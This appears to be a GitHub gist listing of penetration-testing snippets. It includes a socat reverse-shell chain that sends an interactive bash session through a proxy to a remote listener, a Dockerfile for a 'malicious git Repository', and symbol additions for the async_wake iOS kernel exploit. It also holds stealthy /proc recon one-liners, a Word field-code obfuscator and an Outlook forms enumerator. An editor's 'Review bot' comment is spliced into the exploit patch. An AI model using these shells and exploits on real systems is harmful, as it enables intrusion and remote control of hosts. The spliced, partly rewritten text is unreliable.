staaldraad / README.md

Based on the excellent write-up at https://www.elttam.com.au/blog/ruby-deserialization/

Using YAML.dump(payload) in the above script doesn't work; it only produces the following YAML, which is worthless:

--- !ruby/object:Gem::Requirement
requirements:
- - ">="
  - !ruby/object:Gem::Version
    version: '0'
staaldraad / Dockerfile
Created Sep 4, 2018
Dockerfile to get a malicious git Repository up and running
FROM ubuntu:16.04
# Chain with && so a failed package-list update aborts the build instead of being ignored
RUN apt-get update && \
    apt-get install -y git apache2
# Repositories served by Apache live under /srv/git
RUN mkdir /srv/git
# git-http.conf (expected beside this Dockerfile) holds the Apache config for serving git over HTTP
COPY git-http.conf .
RUN cat git-http.conf >> /etc/apache2/apache2.conf
staaldraad / socat through proxy
# Listener on x.x.x.x:443:
socat file:`tty`,raw,echo=0 tcp-listen:443
# Reverse shell proxy server is at 10.10.10.1:8222:
socat UNIX-LISTEN:/tmp/x,reuseaddr,fork PROXY:10.10.10.1:x.x.x.x:443,proxyport=8222 &
socat exec:'bash -li',pty,stderr,setsid,sigint,sane unix:"/tmp/x"
staaldraad / keybase.md

Keybase proof

I hereby claim:

  • I am staaldraad on github.
  • I am staaldraad (https://keybase.io/staaldraad) on keybase.
  • I have a public key ASBLRjbIk9YHmGLclVKxEorNIKsYZgbdW0uh0ugCrhdGYwo

To claim this, I am signing this object:

staaldraad / async_ios_11_1_2.patch
Last active May 2, 2019
Add iPhone 6 symbols along with the symbols @cji added for iPad mini 2.
--- async_wake_ios 2/async_wake_ios/symbols.c 2017-12-11 17:01:53.000000000 +0100
+++ async_wake_ios/async_wake_ios/symbols.c 2017-12-13 13:17:32.000000000 +0100
@@ -131,6 +131,50 @@
0xFFFFFFF007194BBC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code."
};
+uint64_t ksymbols_iphone_6_15b202[] = {
+ 0xFFFFFFF0074A4A4C, // KSYMBOL_OSARRAY_GET_META_CLASS,
+ 0xFFFFFFF007533CF8, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS
+ 0xFFFFFFF0075354A0, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX
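Review bot: the comment on the first new entry ends with a stray comma (`// KSYMBOL_OSARRAY_GET_META_CLASS,`) while the entries that follow do not; drop it so the new table matches the comment style of the existing entries. The header announces 44 added lines but only the first four are visible here, so the remainder of the table and its closing `};` cannot be checked in this preview.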
staaldraad / uid_awk.sh
Created Dec 12, 2017
Get the uid, gid and user groups without touching /etc/passwd or running the `id` command
awk -F: 'END {print "uid:"u" gid:"g" groups:"gg}{if($1=="Uid"){split($2,a," ");u=a[1]}if($1=="Gid"){split($2,a," ");g=a[1]}if($1=="Groups"){gg=$2}}' /proc/self/status
staaldraad / awk_netstat.sh
Last active Nov 19, 2019
AWK to get details from /proc/net/tcp and /proc/net/udp when netstat and lsof are not available
# Gawk version (strtonum available). In /proc/net/tcp, $2 = local_address and $3 = rem_address,
# each written as little-endian hex IP ":" hex port, e.g. 0100007F:0CEA is 127.0.0.1:3306
# Remote
grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($3,index($3,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($3,i,2))}{print x":"strtonum("0x"substr($3,index($3,":")+1,4))}'
# Local
grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($2,index($2,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($2,i,2))}{print x":"strtonum("0x"substr($2,index($2,":")+1,4))}'
# No Gawk: plain awk has no strtonum, so hex is converted by hand (the hextodec body below completes the truncated original)
# Local
grep -v "rem_address" /proc/net/tcp | awk 'function hextodec(str,ret,n,i,k,c){
  ret = 0; n = length(str)
  for (i = 1; i <= n; i++) { c = tolower(substr(str, i, 1)); k = index("123456789abcdef", c); ret = ret * 16 + k }
  return ret
}
{x=hextodec(substr($2,index($2,":")-2,2)); for (i=5; i>0; i-=2) x = x"."hextodec(substr($2,i,2))}{print x":"hextodec(substr($2,index($2,":")+1,4))}'
staaldraad / str2quote.py
#!/usr/bin/env python3
# Converts a string to a Word {QUOTE} field code: each character becomes its decimal code point
print("Converts a string to the {QUOTE} Field code")
st = input("String to convert: ")
v = [str(ord(y)) for y in st]
print("{ QUOTE %s }" % ' '.join(v))
staaldraad / oauthServer.go
Last active Dec 21, 2017
A mini OAuth server for Azure
package main

import (
	"crypto/tls"
	"fmt"
	"io/ioutil"
	"net/http"
	"net/url"
	"strings"
)
staaldraad / findForms.ps1
Add-Type -assembly "Microsoft.Office.Interop.Outlook";
$outlook = New-Object -comobject Outlook.Application;
$mapi = $outlook.GetNamespace("MAPI")
# 6 = olFolderInbox
$fld = $outlook.Session.GetDefaultFolder(6);
# Custom form definitions are stored as hidden items; table type 1 = olHiddenItems
$t = $fld.GetTable("[MessageClass] = 'IPM.Microsoft.FolderDesign.FormsDescription'",1);
$c = $t.GetRowCount();
while($c -gt 0) {
    $r = $t.GetNextRow();
    # Column 1 of a default table is the EntryID; resolve it to the full item
    $itm = $mapi.GetItemFromID($r.item(1));
    # (completion of the truncated loop: emit the item and count down)
    $itm
    $c--
}